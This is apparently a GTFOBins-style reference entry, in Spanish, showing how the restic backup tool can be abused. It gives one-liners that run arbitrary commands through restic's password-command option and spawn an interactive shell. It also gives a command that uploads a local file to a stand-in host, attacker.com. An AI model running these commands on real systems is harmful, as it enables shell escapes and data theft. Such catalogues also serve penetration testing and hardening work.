./restic --examples
Funciones y ejemplos de uso
command
RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup
restic --password-command='/path/to/command' backup
shell
RESTIC_PASSWORD_COMMAND='/bin/sh -c "/bin/sh 0<&2 1<&2"' restic backup
restic --password-command='/bin/sh -c "/bin/sh 0<&2 1<&2"' backup
upload
restic backup -r rest:http://attacker.com:12345/x /path/to/input-file
./related --binary=restic
Binarios relacionados
Comparten al menos una función con restic.